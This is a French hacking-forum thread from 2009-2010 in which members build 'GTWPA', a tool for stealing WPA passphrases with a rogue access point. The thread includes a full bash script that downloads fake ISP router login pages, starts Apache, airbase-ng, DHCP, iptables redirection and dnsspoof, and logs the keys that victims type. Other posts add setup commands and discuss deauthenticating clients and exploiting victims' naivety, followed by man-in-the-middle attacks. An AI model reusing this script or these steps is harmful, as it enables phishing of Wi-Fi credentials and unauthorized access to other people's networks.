Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#101 19-01-2010 20:21:02

CruorVinco
Membre V.I.P.
Lieu : gatineau,québec
Inscription : 18-12-2009
Messages : 297

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

sylphide a écrit :

moi j'y comprend pas grand choses, mais je vous dit bon courage pour votre boulot smile

¸
c'est tu le sylphide qui jouai a  metin 2 sa??


si tu ne cherche pas par toi meme en premier...tu n'arrivera pas a grand chose!!!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#102 19-01-2010 20:38:22

sylphide
Membre Actif
Inscription : 21-12-2009
Messages : 35

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

?? et en français sinon? jouer a quoi?

Dernière modification par sylphide (19-01-2010 20:39:46)

Hors Ligne

#103 02-09-2010 16:15:46

Vahia
Membre
Inscription : 02-09-2010
Messages : 12

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Bonjour à tous !
Tout d'abord je tiens à vous dire que le projet GTWPA me passionne ! C'est un vrai régal de lire ce topic !
Bon, de mon côté, je ne suis pas calé comme vous et je suis un noob en linux donc je ne vois pas trop comment je pourrais vous aider.

Une petite question me turlupine quand même. Savez-vous comment le client reconnait sa box ? Par son adresse mac ?!
Si oui, ne serait-il pas possible, lors d'une attaque deauth, de faire redémarrer la box (pour qu'elle se réinitialise par exemple) ?
Ainsi ça laisserai un laps de temps pour se faire passer pour la box (en prétendant avoir la même adresse mac) vu que le client va tout de suite chercher à se reconnecter.

C'est peut-être bête ce que je dis, voir tout simplement impossible mais je préférais tout de même vous le dire au cas où (peu probable, je sais...) personne n'y aurai pensé...

Dernière modification par Vahia (02-09-2010 16:16:55)

Hors Ligne

#104 02-09-2010 16:33:34

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Salut Vahia, bienvenue sur le forum smile

Pour ta question, la grosse faille du WiFi (qui permet des attaques genre GTWPA), c'est que le client ne reconnaît pas sa box (par défaut). Il reconnaît un SSID, éventuellement une méthode de chiffrement, mais il ne préviendra pas l'utilisateur que l'adresse MAC de la box a changé (de toute façon, quand on voit à quel point c'est simple de falsifier une MAC... roll). C'est dans un souci de simplicité (pour changer de routeur simplement), mais oui, c'est un point faible, bien vu smile

Pour l'attaque que tu proposes, il y a une façon plus efficace de faire les choses : tu crées ton propre point d'accès sur ta machine attaquante, avec le même SSID, et tu utilises airdrop-ng pour empêcher toute connexion à l'AP légitime. Le client ne voit qu'un seul réseau (puisque tu as le même SSID) et un seul routeur auquel il peut se connecter : Paf ! T'as plus qu'à l'accueillir avec une jôlie page personnalisée wink

Hors Ligne

#105 03-09-2010 08:05:42

Vahia
Membre
Inscription : 02-09-2010
Messages : 12

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Dit comme ça, ça a l'air simple ! wink
Alors qu'est-ce que c'est qui bloque M1ck3y, Atrax et autres prodiges du wi-fi ?!

A moins que, vu l'ancienneté du sujet, le projet GTWPA ai été finalisé...

Hors Ligne

#106 03-09-2010 11:04:32

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Le projet est un peu au point mort, à cause d'une difficulté technique somme toute importante :

M1ck3y a écrit :

Si on n'a pas poursuivi les travaux sur ce projet c'est justement parce qu'on est bloqués au niveau de la connexion du client à la rogue AP, une fois qu'on aura reglé cela on pourra continuer le développement de notre tool...

Tout l'astuce du système consiste à "forcer" la reconnexion automatique du client sur un réseau qui n'a PAS le même système de protection (OPN au lieu de WPA). On peut compter sur la naïvetés de certains victimes qui vont aller se reconnecter d'elles-mêmes, mais pour que le système soit efficace il faudrait automatiser tout ca wink

Hors Ligne

#107 03-09-2010 11:32:23

Vahia
Membre
Inscription : 02-09-2010
Messages : 12

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Ok merci !
En espérant qu'une solution soit trouvée... wink

Hors Ligne

#108 24-09-2010 21:14:30

seb2000
N00b
Inscription : 28-08-2008
Messages : 1

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

tres interessant ce topic, quelqu'un a t il le lien pour telecharger gtwpa.sh, pas trouvé de lien sur le forum ni sur la page d'accueil .....

Hors Ligne

#109 29-09-2010 15:17:29

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

J'avouerai avoir envie de poser la même question que seb2000, le projet bloque sur la technique visant à rabbattre automatiquement un client sur la Rogue mais en attendant, le reste est-il totalement fonctionnel ? (à ce que je lis, oui):

- Création Rogue AP (dhcp ... iptables ... etc)
- Création serveur
- Redirection du client connecté sur la Fake_Page
- Log des entrées dans fichier.txt présent sur le serv

?


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#110 29-09-2010 16:35:17

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Les liens pour downloader les différentes versions du script sont dispos dans ce meme topic, il suffit de lire un peu ce qui se passe après la première page.

Pour répondre à ta question Carto_, oui la partie serveur est fonctionnelle, tout est d'ailleurs détaillé dans ce sujet ainsi que dans ceux là: Technique de recuperation de clef WPA par rogue et PHP et Les pages rogue AP finalisées: le topic dédié. Il y a en revanche trois choses à améliorer:

-le script est fonctionnel sous BT3 (il avait été développé pour BT3 à l'époque) mais doit etre adapté pour fonctionner sous BT4.

-la partie stats reste à finir, pour l'instant on se contente de récupérer la clé dans un fichier txt mais dans le cas ou tu passes à d'autres pages fake, ton fichier txt sera effacé. Il faudrait stocker les infos essid adresse mac (éventuellement) et surtout passphrase dans une petite base de données.

-la partie rogue AP reste également à peaufiner, on avait fait pas mal de tests à l'époque mais on n'avait pas réussi à réaliser quelque chose de pleinement fonctionnel sur du WPA.

Voila, si des amateurs veulent reprendre le boulot existant (la partie serveur et les pages fakes fonctionnelles) et rajouter la partie rogue AP, les stats et adapter le tout à la sauce Backtrack 4 je vous en prie, ce projet est resté en suspens mais c'est un beau challenge technique wink

Hors Ligne

#111 29-09-2010 19:10:24

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Je pourrais créer la partie des stats mais pas tout de suite, faut que je finisse d'installer archlinux sur mon netbook !

Hors Ligne

#112 29-09-2010 20:58:53

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Pour ce qui est du portage sur BT4 et de la partie Rogue AP je vais tâcher de regarder si mes connaissances ne sont pas trop maigres, je me mets au travail ! Pour ce qui est des stats, Dack je le laisse gérer j'y connais rien smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#113 29-09-2010 22:25:11

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

c cool carto de donner du temps je veux biens vous faire un script php pour récupérer les infos dans un fichier txt sans quelle s'écrase ça c dans mes cordes si ça peut aider !

Hors Ligne

#114 29-09-2010 23:17:23

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

@Veidam = Les infos s'ajoutent à la suite dans le fichier texte, elle ne s'écrasent pas ! C'est déjà opérationnel.

Alors, j'ai travaillé un peu sur le script et je suis arrivé à un résultat on ne peut plus concluant pour une première batterie de tests et une petite heure passée dessus.

Soucieux d'une meilleure compréhension générale du tool, je me permet de poster la source en entier, comprenant mes ajouts quant à la partie (6).

Je précise que je tourne sur BT4 et que pour le moment le script fonctionne Out of the box.
Je résume donc :

- On lance le script
- On passe par la case installation (1)
- On choisit sa box (2)
- On lance le serveur Apache (3)
- On vérifie que le serveur est fonctionnel (4)
- On lance la Rogue AP (6)
- On attend qu'une victime se connecte et POUF, elle se retrouve sur la page de la box, contrainte à rentrer sa clé, qui vient alors s'ajouter gentiment au fichier .txt présent dans /var/www/ avec les autres fichiers .php de la fake_page.

C'est loin d'être fini et j'ai viré beaucoup d'options pour vérifier que tout fonctionne, je continue à coder le tout et je re-poste quand j'ai un peu plus avancé (je taff aussi sur l'option déauth si le client ramène pas ses fesses assez vite).


#!/bin/bash
# Grand Theft WPA v0.11-betatest
# Merci à tous ceux qui bossent sur le projet:
# Atrax, M1ck3y, Seb-tazTite-live, Webcapitain... 
# 
# Aidez nous à développer ce tool ;)

# intro
intro="\n
-----------------------------------------------------\n
---_____________________------____________--_____----\n
--/--_____/\__----___/--\----/--\______---\/--_--\---\n
-/---\--___--|----|--\---\/\/---/|-----___/--/_\--\--\n
-\----\_\--\-|----|---\--------/-|----|--/----|----\-\n
--\______--/-|____|----\__/\--/--|____|--\____|__--/-\n
---------\/-----------------\/-------------------\/--\n
-----------------------------------------------------\n
----------------~ Innovative WPA TOOL ~--------------\n
----~ Rogue AP/Fake Admin Panel WPA Key Grabber ~----\n
----------------~ Brought to you by ~----------------\n
-~ Atrax, M1ck3y, Seb-taz, Tite-Live, Webcapitain ~--\n
-----------------------------------------------------\n
------------------ \033[01;34mwww.crack-wpa.fr\033[0m -----------------\n
-----------------------------------------------------\n"


# Choix d'Action
clear
echo -e $intro
echo "--> Veuillez Entrer Votre Choix:"
echo
echo "--> 1 Installation de GTWPA"
echo "--> 2 Préparation de la Rogue AP"
echo "--> 3 Démarrage de la Rogue AP (Apache)"
echo "--> 4 Vérification de la Rogue AP (Test serveur local)"
echo "--> 5 Arret de la Rogue AP (Apache)"
echo "--> 6 Attaque airbase-ng GTWPA Non Transparente (Victime vers HTTP local)"
echo "--> 7 Attaque airbase-ng GTWPA Transparente (Victime vers connexion Internet)"
echo "--> 8 Statistiques GTWPA"
echo
echo "--> Votre Choix:"
read choix
case $choix in
#Installation de GTWPA
1)
clear
echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 5 s"
sleep 1
clear
echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 4 s"
sleep 1
clear

echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 3 s"
sleep 1
clear
echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 2 s"
sleep 1
clear
echo -e $intro
echo -e "--> Installation de GTWPA (supprime /root/GTWPA):"
echo -e "--> Début de l'installation dans 1 s"
sleep 1
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 0%[>]"
# nettoyage
rm -f -r /root/GTWPA
# on crée l'arborescence 
mkdir /root/GTWPA
mkdir /root/GTWPA/server
mkdir /root/GTWPA/server/backup
mkdir /root/GTWPA/server/rogue
mkdir /root/GTWPA/stats
mkdir /root/GTWPA/conf
mkdir /root/GTWPA/logs

#On download les archives des pages fake
cd /root/GTWPA/server/backup
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 0%[>               ]"
echo -e
wget http://www.crack-wpa.fr/tl/Numericable.tar.gz
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 20%[===>            ]"
echo -e
wget http://www.crack-wpa.fr/tl/Freebox.tar.gz
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 40%[======>         ]"
echo -e
wget http://www.crack-wpa.fr/webcapitain/rogue_php.zip
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 60%[=========>      ]"
echo -e
wget http://www.crack-wpa.fr/webcapitain/neuf_php.zip
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 80%[============>   ]"
echo -e
wget http://www.crack-wpa.fr/tl/Speedtouch.tar.gz
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 90%[=============>  ]"
echo -e
wget http://www.crack-wpa.fr/tl/Neufbox.tar.gz
#On download les autres fichiers et on crée le fichier de log (vide pour l'instant)
cd /root/GTWPA/stats
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 95%[==============> ]"
echo -e
wget http://www.crack-wpa.fr/tl/conf/stats.txt
mv stats.txt stats.php
cd /root/GTWPA/conf
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 95%[==============> ]"
echo -e
wget http://www.crack-wpa.fr/tl/conf/httpd.conf
cd /root/GTWPA/logs
> log.txt
clear
echo -e $intro
echo -e "--> Installation en cours..."
echo -e "--> 100%[===============>]"
echo -e
sleep 3
clear
echo -e $intro
echo -e "--> Installation terminée"
cd /root/
sleep 4
$0;;
#Preparation de la rogue ap (choix du fake panel admin, decompression de l'archive dans /root/GTWPA/server/rogue, modif de l'essid.txt et chmod -R 777 /root/GTWPA/server/rogue)
2)
clear
echo -e $intro
echo -e "--> Preparation de la Rogue AP"
echo
echo "--> Veuillez Entrer les informations Suivantes:"
echo
echo "--> (TYPE: l'interface désirée)"
echo "--> (1:Numericable)"
echo "--> (2: Freebox)"
echo "--> (3: Livebox)"
echo "--> (4: SFR-Neufbox)"
echo "--> (5: Tele2box Speedtouch)"
echo "--> (6: Neufbox originale)"
echo
echo "--> (ESSID: l'essid)"
echo "--> (MACAP: @mac de l'AP: SFR-Neufbox et Neufbox originale seulement)"
echo
echo "--> TYPE ESSID MACAP"
read type essid macap
if [ "$type" -eq "1" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Numericable.tar.gz /var/www
cd /var/www
tar -xf Numericable.tar.gz
sed -i "s/NUMERICABLE-BOL4/$essid/g" essid.txt
chmod -R 777 /var/www
cd /root/
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Numericable"
echo "--> Essid: $essid"
sleep 5
$0
elif [ "$type" -eq "2" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Freebox.tar.gz /var/www
cd /var/www
tar -xf Freebox.tar.gz
sed -i "s/Freebox-Maison/$essid/g" essid.txt
chmod -R 777 /var/www
cd /root/
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Freebox"
echo "--> Essid: $essid"
sleep 5
$0
elif [ "$type" -eq "3" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/rogue_php.zip /var/www
cd /var/www
unzip rogue_php.zip
sed -i "s/liveboxmachin/$essid/g" essid.txt
chmod -R 777 /var/www
cd /root/
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Livebox"
echo "--> Essid: $essid"
sleep 5
$0
elif [ "$type" -eq "4" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/neuf_php.zip /var/www
cd /var/www
unzip neuf_php.zip
sed -i "s/essid_test/$essid/g" essid.txt
sed -i "s/00:11:22:33:44:55/$macap/g" macap.txt
chmod -R 777 /var/www
cd /root/
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: SFR-Neufbox"
echo "--> Essid: $essid"
echo "--> Adresse mac: $macap"
sleep 5
$0
elif [ "$type" -eq "5" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Speedtouch.tar.gz /var/www
cd /var/www
tar -xf Speedtouch.tar.gz
sed -i "s/Speedtouch-503C/$essid/g" essid.txt
chmod -R 777 /var/www
cd /root/
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Tele2box Speedtouch"
echo "--> Essid: $essid"
sleep 5
$0
elif [ "$type" -eq "6" ] ; then
rm -f -r /root/GTWPA/server/rogue/*
cp /root/GTWPA/server/backup/Neufbox.tar.gz /var/www
cd /var/www
tar -xf Neufbox.tar.gz
sed -i "s/Indéterminé/$essid/g" essid.txt
sed -i "s/Indéterminée/$macap/g" mac.txt
chmod -R 777 /var/www
cd /root/
clear
echo -e $intro
echo -e "--> Rogue AP configurée"
echo
echo "--> Type: Neufbox originale"
echo "--> Essid: $essid"
echo "--> Adresse mac: $macap"
sleep 5
$0
fi
$0;;
#Start Apache
3)
clear
echo -e $intro
echo -e "--> Démarrage du serveur Apache"
echo -e "--> Fichier de configuration: /root/GTWPA/conf/httpd.conf"
sleep 5
stop-apache
service apache2 start
clear
echo -e $intro
echo -e "--> Serveur Apache up &running"
echo -e "--> Let's go grabbing some WPA keys ;)"
sleep 5
$0;;
#Test Local
4)
clear
echo -e $intro
echo -e "--> Test du serveur local Apache"
echo -e "--> Visualisation de http://127.0.0.1"
sleep 5
firefox 127.0.0.1
$0;;
#Stop Apache
5)
clear
echo -e $intro
echo -e "--> Arret du serveur Apache"
echo -e "--> Fichier de configuration: /root/GTWPA/conf/httpd.conf"
sleep 5
service apache2 stop
clear
echo -e $intro
echo -e "--> Serveur Apache down"
echo -e "--> La peche est elle bonne? ;)"
sleep 5
$0;;
#Test Local
[b][color=#F00E52]6)
# CODAGE DE LA PARTIE VI PAR CARTO_ // LOIN D'ETRE FINI, PHASE DE TESTS
clear
echo -e $intro
echo -e "--> Attaque airbase-ng GTWPA Non Transparente (Victime vers HTTP local)"
echo -e "--> Lancement de la ROGUE AP non transparente"
sleep 1



# On crée un fichier dns.txt avec l'IP du routeur créé par la Rogue_AP pour dnsspoof
####### NE FONCTIONNE PAS #### echo "192.168.1.129 *" > /root/dns.txt;

# On kill les processus pour mieux les relancer sans conflits
killall -9 dhcpd tcpdump airbase-ng dhcpd3

# On active l'ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward;
cat /proc/sys/net/ipv4/ip_forward;

# On récupère les infos destinées à la création de la Rogue_AP
echo ">>> Interface destinée à la création de la Rogue_AP ? ";
read WIFACE
echo

airmon-ng start $WIFACE;
modprobe tun;
echo

echo ">>> Channel de la Rogue_AP ?"
read CHANNEL

xterm -hold -e airbase-ng -P -C 30 -c $CHANNEL -e TEST -v mon0 &>/dev/null &
sleep 1

# On configure notre interface at0 créée par airbase-ng
modprobe tun ;
ifconfig at0 up ;
ifconfig at0 192.168.1.129 netmask 255.255.255.128 ;
ifconfig at0 mtu 1400 ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;

# On configure le serveur dhcp3
cat >/etc/default/dhcp3-server <<EOF
INTERFACES="at0"
EOF

# On crée notre fichier dhcpd.conf visé à être utilisé par le server dhcp3
cat >/root/dhcpd.conf  <<EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 208.67.222.222;
range 192.168.1.130 192.168.1.140;
}
EOF

# On configure les règles iptables, visant à tout retourner sur notre serveur apache2
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222;
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.1.129:80

# On lanche dnsspoof pour tout retourner vers notre routeur qui pointe vers apache2
xterm -hold -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &
sleep 1

# On lance le serveur DHCP3 pour attribuer une IP à l'éventuel client
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
xterm -hold -e dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &
sleep 1


echo "Le script est en cours d'exécution, en attente de connexion d'une victime"


$0;;
#Test Local
7)
clear
echo -e $intro
echo -e "--> Attaque airbase-ng GTWPA Transparente (Victime vers connexion Internet)"
echo -e "--> Fonction disponible prochainement"
sleep 5
$0;;
#Stats GTWPA
8)
clear
echo -e $intro
echo -e "--> Statistiques GTWPA"
echo -e "--> Visualisation de http://127.0.0.1/stats.php"
sleep 5
rm -f -r /root/GTWPA/server/rogue/stats.php
cp /root/GTWPA/stats/stats.php /root/GTWPA/server/rogue/stats.php
firefox 127.0.0.1/stats.php
$0;;
esac
#Et voila, la première version de notre petit tool. L'installation et la partie "serveur rogue" sont opérationnels, il reste à implémenter
#l'attaque (ou les différentes attaques) airbase-ng, récupérer les clés dans les stats...
#
#http://www.crack-wpa.fr/forum/
#
#Changelog
#0.11: Correction d'erreur chmod (récursivité) + modif php des pages=> affichage des pages fake sur le serveur local ok
#
#ToDo
#
#-Récupération des date/time, essid et clé dans /root/GTWPA/logs/log.txt pour permettre l'affichage des logs dans la page de stats (Finition de la partie serveur)
#-Inclusion des attaques airbase-ng pour grabber du client (mode transparent et non transparent redirigé vers l'apache local pour grabber des clés ou vers karmetasploit pour choper du cookie)
#-Quand tout sera fonctionnel, modifier le codage du script au niveau de l'utilisation des variables pour permettre une utilisation du tool via un gui
#
#Bref, pas mal de boulot encore. Courage :)

N'hésitez pas à critiquer un maximum, c'est mal codé, vite fait et je ne sais pas coder donc au moins les critiques seront constructives mais j'essaye d'apporter ma pierre à l'édifice .. smile



Pour ceux qui veulent aller plus vite, voilà la seule partie modifiée par mes soins :

[b][color=#F00E52]6)
# CODAGE DE LA PARTIE VI PAR CARTO_ // LOIN D'ETRE FINI, PHASE DE TESTS
clear
echo -e $intro
echo -e "--> Attaque airbase-ng GTWPA Non Transparente (Victime vers HTTP local)"
echo -e "--> Lancement de la ROGUE AP non transparente"
sleep 1



# On crée un fichier dns.txt avec l'IP du routeur créé par la Rogue_AP pour dnsspoof
####### NE FONCTIONNE PAS #### echo "192.168.1.129 *" > /root/dns.txt;

# On kill les processus pour mieux les relancer sans conflits
killall -9 dhcpd tcpdump airbase-ng dhcpd3

# On active l'ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward;
cat /proc/sys/net/ipv4/ip_forward;

# On récupère les infos destinées à la création de la Rogue_AP
echo ">>> Interface destinée à la création de la Rogue_AP ? ";
read WIFACE
echo

airmon-ng start $WIFACE;
modprobe tun;
echo

echo ">>> Channel de la Rogue_AP ?"
read CHANNEL

xterm -hold -e airbase-ng -P -C 30 -c $CHANNEL -e TEST -v mon0 &>/dev/null &
sleep 1

# On configure notre interface at0 créée par airbase-ng
modprobe tun ;
ifconfig at0 up ;
ifconfig at0 192.168.1.129 netmask 255.255.255.128 ;
ifconfig at0 mtu 1400 ;
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129 ;

# On configure le serveur dhcp3
cat >/etc/default/dhcp3-server <<EOF
INTERFACES="at0"
EOF

# On crée notre fichier dhcpd.conf visé à être utilisé par le server dhcp3
cat >/root/dhcpd.conf  <<EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 208.67.222.222;
range 192.168.1.130 192.168.1.140;
}
EOF

# On configure les règles iptables, visant à tout retourner sur notre serveur apache2
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222;
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.1.129:80

# On lanche dnsspoof pour tout retourner vers notre routeur qui pointe vers apache2
xterm -hold -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &
sleep 1

# On lance le serveur DHCP3 pour attribuer une IP à l'éventuel client
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
xterm -hold -e dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &
sleep 1


echo "Le script est en cours d'exécution, en attente de connexion d'une victime"


$0;;

Dernière modification par Carto_ (29-09-2010 23:22:59)


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#115 30-09-2010 09:35:22

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Ton script ne m'a pas l'air mal du tout,il faudra que je teste:)

Voici ce que j'utilise comme commande pour unbutu 9.10 qui et assez proche de bactrack4.

Pour de l'open configurer:

etc/network/interfaces et
/etc/dhcp3/dhcpd.conf

Les commandes:

airbase-ng -c 6 -e RÉSEAU -a BSSID mon0
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE 
iptables --append FORWARD --in-interface mon0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.1.1:80
echo 1 > /proc/sys/net/ipv4/ip_forward
/etc/init.d/dhcp3-server restart

le dhcp:

option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;


subnet 192.168.1.0 netmask 255.255.255.0 {
    interface mon0;
range 192.168.1.10 192.168.1.20;
    option subnet-mask 255.255.255.0;
    option routers 192.168.1.1;
    option domain-name-servers 192.168.0.1;
# ou essayer avec 208.67.222.222, 208.67.220.220 si sa marche pas.
}

Enfin on met un fichier de gtwpa dans /var/www puis un petit:

dnsspoof -i at0 -f dns.txt

et le tour et joué:rolleyes:

Pour ne faire que du local:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80

echo 1 > /proc/sys/net/ipv4/ip_forward
/etc/init.d/dhcp3-server restart


A changer le dhcp.conf en conséquence.

Si jamais il y a un probleme avec le script de carto essayer avec ces commandes,c'est a plusieurs qu'on réussira^^

Hors Ligne

#116 30-09-2010 11:12:47

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Super pour tes commandes, dès que j'aurais le temps je vais essayer de rajouter en début de script un "read" ou l'on demande quelle système utilise l'utilisateur du script pour exécuter le script en fonction : BT4, Ubuntu ou BT3.

Ça pourrait faire un script bien complet utilisable par le plus grand nombre. Le souci c'est que n'ayant pas d'Ubuntu ni de BT3 sous la main pour le moment il faut que je monte tout ça et que j'effectue différents tests, je compte sur vous pour essayer les scripts et me renvoyer les erreurs éventuelles.

Par ailleurs, je finis ce soir de monter "l'option déauth" pour rajouter dans GTWPA une option visant à tenter de déconnecter la victime de son AP pour qu'elle puisse se reconnecter à la nôtre qui aura une meilleure puissance (tout ça sur de l'Open, pour le WPA on s'en occupe dès qu'on a finit la partie OPEN mais logiquement ça ne devrait pas être plus compliqué).

Carto_


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#117 30-09-2010 17:42:56

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Par ailleurs, je finis ce soir de monter "l'option déauth" pour rajouter dans GTWPA une option visant à tenter de déconnecter la victime de son AP pour qu'elle puisse se reconnecter à la nôtre qui aura une meilleure puissance

Une meilleur puissance au niveau du fake AP?tu compte augmenter le dB ou le mtu?

Pour le wpa c'est pas bien compliqué(plus de configuration c'est sur)mais sa va encore,le problème et que si tu connais la clé tu peux faire un mitm mais sans la connaitre sa va échouer a cause du "dialogue" AP --> client et inversement,le tout sera crypté et donc inutile(a ma connaissance en tout cas).

Hors Ligne

#118 30-09-2010 17:51:09

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Pour l'option deauth il y a airdrop-ng


Sharkoff

Hors Ligne

#119 30-09-2010 17:52:31

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

L'idée serait de déauth le client de son AP WPA et de le pousser à se reconnecter sur notre AP OPEN (ou d'attendre tout simplement, mais c'est le coeur du problème du projet GTWPA) et une fois qu'il nous a donné sa clé, alors on se connecte sur sa boxe et on lance un MITM.


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#120 30-09-2010 18:01:54

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Dans ce cas on peut utiliser airdrop ou aireplay pour ciblé l'ap et déconnecter le client egalement(apparement airdrop utilise de bonne options)mais meme si sa marche je pense que windows renverra ce message lors de la connexion:

Les informations envoyées sur ce réseau peuvent etre visibles par d'autres utilisateur

Il y a encore pas mal de choses a tester avnt d'avoir un sript fonctionnel mais c'est faisable techniquement et en jouant sur la naiveté de la victime

